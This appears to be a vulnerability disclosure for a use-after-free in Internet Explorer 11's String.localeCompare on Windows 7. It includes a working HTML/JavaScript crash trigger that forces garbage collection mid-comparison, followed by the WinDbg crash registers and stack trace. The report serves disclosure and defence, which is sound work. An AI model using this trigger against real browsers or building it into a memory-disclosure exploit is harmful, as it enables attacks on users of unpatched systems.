IE11: Use-after-free in String.localeCompare

There is a Use-after-free vulnerability in Internet Explorer that could potentially be used for memory disclosure. This was tested on IE11 running on Window 7 64-bit with the latest patches applied. PoC: ``` <!-- saved from url=(0014)about:internet --> <script> var vars = new Array(2); function main() { vars[0] = new Array(1000000); vars[1] = String.prototype.substr.call(vars[0], 100); var o = {}; o.toString = f8; String.prototype.localeCompare.call(vars[1], o); } function f8(arg7, arg8, arg9) { alert(vars[1]); CollectGarbage(); } main(); </script> ``` Debug log: ``` (cd8.f10): Access violation - code c0000005 (first chance) First chance exceptions are reported before any exception handling. This exception may be expected and handled. eax=6ccdaf9c ebx=00000000 ecx=0dd800d8 edx=00000009 esi=0a05bad4 edi=00d63ee0 eip=74ec3ced esp=0a05ba84 ebp=0a05bab8 iopl=0 nv up ei ng nz ac pe cy cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010297 kernel32!LongCompareString+0x153: 74ec3ced 668b11 mov dx,word ptr [ecx] ds:002b:0dd800d8=???? 0:008> r eax=6ccdaf9c ebx=00000000 ecx=0dd800d8 edx=00000009 esi=0a05bad4 edi=00d63ee0 eip=74ec3ced esp=0a05ba84 ebp=0a05bab8 iopl=0 nv up ei ng nz ac pe cy cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010297 kernel32!LongCompareString+0x153: 74ec3ced 668b11 mov dx,word ptr [ecx] ds:002b:0dd800d8=???? 0:008> k # ChildEBP RetAddr 00 0a05bab8 74ec389e kernel32!LongCompareString+0x153 01 0a05bb64 76246d2f kernel32!SortCompareString+0x1bc 02 0a05bb8c 76233081 KERNELBASE!SortCompareString+0x52 03 0a05bbb8 6cfbd23f KERNELBASE!CompareStringW+0x38 04 0a05bc00 6cc56a49 jscript9!Js::JavascriptString::EntryLocaleCompare+0x18f 05 0a05bc4c 6cce4ad1 jscript9!Js::JavascriptFunction::CallFunction<1>+0x91 06 0a05bc70 6cc612fb jscript9!Js::JavascriptFunction::EntryCall+0x95 07 0a05be78 6cc61689 jscript9!Js::InterpreterStackFrame::Process+0xc6d 08 0a05bfac 09410fe1 jscript9!Js::InterpreterStackFrame::InterpreterThunk<1>+0x200 WARNING: Frame IP not in any known module. Following frames may be wrong. 09 0a05bfb8 6cc612fb 0x9410fe1 0a 0a05c1b8 6cc61689 jscript9!Js::InterpreterStackFrame::Process+0xc6d 0b 0a05c2cc 09410fe9 jscript9!Js::InterpreterStackFrame::InterpreterThunk<1>+0x200 0c 0a05c2d8 6cc56a49 0x9410fe9 0d 0a05c31c 6cc56f78 jscript9!Js::JavascriptFunction::CallFunction<1>+0x91 0e 0a05c390 6cc56ead jscript9!Js::JavascriptFunction::CallRootFunction+0xb5 0f 0a05c3d8 6cc56e40 jscript9!ScriptSite::CallRootFunction+0x42 10 0a05c424 6cd645cf jscript9!ScriptSite::Execute+0xd2 11 0a05c4ac 6cd638ee jscript9!ScriptEngine::ExecutePendingScripts+0x1c6 12 0a05c540 6cd64e0a jscript9!ScriptEngine::ParseScriptTextCore+0x300 13 0a05c590 6dd85fd8 jscript9!ScriptEngine::ParseScriptText+0x5a 14 0a05c5c8 6da33f88 MSHTML!CActiveScriptHolder::ParseScriptText+0x51 15 0a05c620 6dd2c88f MSHTML!CJScript9Holder::ParseScriptText+0x5f 16 0a05c690 6da342a7 MSHTML!CScriptCollection::ParseScriptText+0x175 17 0a05c77c 6da3495d MSHTML!CScriptData::CommitCode+0x31e 18 0a05c7fc 6da352ac MSHTML!CScriptData::Execute+0x232 19 0a05c81c 6dd5b156 MSHTML!CHtmScriptParseCtx::Execute+0xed 1a 0a05c870 6d77b11e MSHTML!CHtmParseBase::Execute+0x201 1b 0a05c88c 6d77ab57 MSHTML!CHtmPost::Broadcast+0x182 1c 0a05c9c4 6d80bc2d MSHTML!CHtmPost::Exec+0x617 1d 0a05c9e4 6d80bb93 MSHTML!CHtmPost::Run+0x3d 1e 0a05ca00 6d9f9a4e MSHTML!PostManExecute+0x61 1f 0a05ca14 6d9fa128 MSHTML!PostManResume+0x7b 20 0a05ca44 6d9ee272 MSHTML!CHtmPost::OnDwnChanCallback+0x38 21 0a05ca5c 6d6d604e MSHTML!CDwnChan::OnMethodCall+0x2f 22 0a05caac 6d6d5b9a MSHTML!GlobalWndOnMethodCall+0x16c 23 0a05cb00 759f62fa MSHTML!GlobalWndProc+0x103 24 0a05cb2c 759f6d3a user32!InternalCallWinProc+0x23 25 0a05cba4 759f77c4 user32!UserCallWinProcCheckWow+0x109 26 0a05cc04 759f788a user32!DispatchMessageWorker+0x3b5 27 0a05cc14 6eadabdc user32!DispatchMessageW+0xf 28 0a05fde0 6eb0ecb8 IEFRAME!CTabWindow::_TabWindowThreadProc+0x464 29 0a05fea0 755b971c IEFRAME!LCIETab_ThreadProc+0x3e7 2a 0a05feb8 74513a31 iertutil!_IsoThreadProc_WrapperToReleaseScope+0x1c 2b 0a05fef0 74ec336a IEShims!NS_CreateThread::DesktopIE_ThreadProc+0x94 2c 0a05fefc 775d98f2 kernel32!BaseThreadInitThunk+0xe 2d 0a05ff3c 775d98c5 ntdll!__RtlUserThreadStart+0x70 2e 0a05ff54 00000000 ntdll!_RtlUserThreadStart+0x1b ```